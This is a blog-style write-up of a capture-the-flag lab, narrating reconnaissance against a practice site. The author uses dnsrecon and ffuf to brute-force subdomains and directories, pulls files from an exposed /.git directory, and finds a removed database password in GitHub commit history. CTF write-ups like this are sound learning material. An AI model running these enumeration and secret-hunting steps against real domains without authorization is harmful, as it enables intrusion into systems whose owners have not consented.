Attacking VulnTraining Part 1

This weekend I have decided to take a look at another CTF Challenge between chores over this weekend. However the next challenge that I have access to, called VulnTraining in the free tier of CTF Challenge has 11 flags, so I guess I am not getting this one done in a day.

I start with the basics, I tinkered my .zshrc config to put my CTF Challenge cookie into a variable I decided to test it by running curl -H $CTF_CHALLENGE_COOKIE http://vulntraining.co.uk and in the HTML I see there is a flag. I enter it into the submission field and boom, I have got flag 5, which is awesome, but also annoying because I kinda prefer to get flags in sequential order.

After a quick bit of cleaning up, I come back to see what else I can find quickly, I perform a nslookup using nslookup -type=any vulntraining.co.uk 8.8.8.8 and see something a little out of place, the email address looks like a subdomain and does not have an @ symbol. I decide to curl the weird looking mail address but the an error comes back of could not resolve host. In any case I have an email to remember for later.

I then run dnsrecon using dnsrecon -d vulntraining.co.uk -D ~/ctfs/ctfchallenge/wordlists/subdomains.txt -t brt and as it bruteforces subdomain, I go do some more cleaning.

I get the dnsrecon results back, it returns two new subdomains, I decide that I am going to use a tool called XMind, recommended by Jason Haddix to help map out the structure of the domain.

I head to the shops to grab some food to cook for lunch, do some more chores and come back again. I pump the URL into crt.sh and get another subdomain to add to my mind map. To be honest I have to quash the desire to start pumping IP addresses into NMAP and scanning for vulnerabilities, that is not the point of CTF Challenge’s CTFs, maybe next time I should try a Hack the Box exercise.

I decided to focus on one subdomain or the root domain at a time, looking at the root domain first. I start up ffuf scanning for first of all more subdomains using ffuf -t 2 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/subdomains.txt -u http://FUZZ.vulntraining.co.uk -H $CTF_CHALLENGE_COOKIE -mc all -fc 404, then followed by fuzzing for directories using ffuf -t 2 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://vulntraining.co.uk/FUZZ -H $CTF_CHALLENGE_COOKIE -mc all -fc 404.

I start to see some interesting results from the directory scan, but I decide to take my sisters dog for a walk while I dog sit to help get my blood sugar back down.

Coming back I see that there is a Git repo, a robots.txt file and some other interesting goodies, I decide to determine which files are more directories to fuzz. One result called server redirects me to a login page at /server/login, I make a note. /framework gives me a permission denied response and I notes /.git gives be a 403 but not /.git/HEAD so I make a note of that.

Looking at /robots.txt I see they have a disallowed entry, which means web crawlers like Google are meant to not show that as a response, so I know I have to try it and I find flag 2, win for the find, loss for the sequential order OCD.

I decide to look into the Git repo next and access /.git/HEAD, /.git/index and /.git/config which downloads three files through which I find the publicly accessible GitHub repo.

I open the GitHub repo up and browse the commit history, thankfully it is only 3 commits and the latest one talks about removing a password. Pro-tip, if a secret is committed to history, removing it in another commit is not enough, you need to rotate the said secret. I note down where to find the DB password and have a quick look at some functions, but decide not to try and find any vulnerabilities in the code and it’s logic just yet.

I do notice that it looks like /framework will have some sub-directories, so I decide to fuzz it with ffuf -t 2 -p 0.1 -w ~/ctfs/ctfchallenge/wordlists/content.txt -u http://vulntraining.co.uk/framework/FUZZ -H $CTF_CHALLENGE_COOKIE -mc all -fc 404.

While waiting for that I take a look at the site hosted on the root domain, nothing really special apart from the original flag I found, a single page, which is PHP (yuck). I then change my mind and decide to look through the code in GitHub,noticing that there should be at least 4 sub-directories which ffuf find and nothing else.

I then run another ffuf scan on /.git to see if I find anything interesting but to be honest I am not holding my breath. After taking a look at the source code in GitHub, I realise I am too tired to process that, so decide to leave that for another day. The fuzz of .git provides nothing useful so I decide to fuzz /server to see what else I get.

Fuzz all the things meme

Again the extra fuzzing does not find anything new, the only two directories left are CSS and JS which I decide to leave for later. I quickly curl the servers login page to see if there is a flag in there somewhere but find nothing. I debate what to do next, I could try and brute force the login form or change to a subdomain. I decide to see how hard it would be to get a login set and find that the error message for a bad login is generic and does not specify if the username or password is incorrect, it only returns “Your username or password is incorrect”. I decide I can not be bothered right now.

I decide to quickly checkout the extra subdomain I found via crt.sh and see flag 1 just sitting there, which gives me a bit more motivation to push on for a little bit longer. I decide to switch to admin.vulntraining.co.uk and have a quick fuzz, searching for a subdomain of admin and then directories. I find the directories /admin and /invoices and add them to the mind map, but I do not find any further subdomains.

I quickly try fuzzing the billing subdomain and I get no new subdomains but I do start getting 429 response errors, I am not sure why so I adjust my rate limiting and try and get more sub-directories. I get it all sorted and start getting some 302 responses for numerical sub-directories and then the usual logout and login sub-directories.

I try curling the root admin subdomain and the two directories and get unauthroised responses, at which I decide to call it a day, I am tired and really want a nap. I am still happy with the progress I made considering this was a CTF that I was chipping away at while I did chores and I really look forward to picking it up again soon.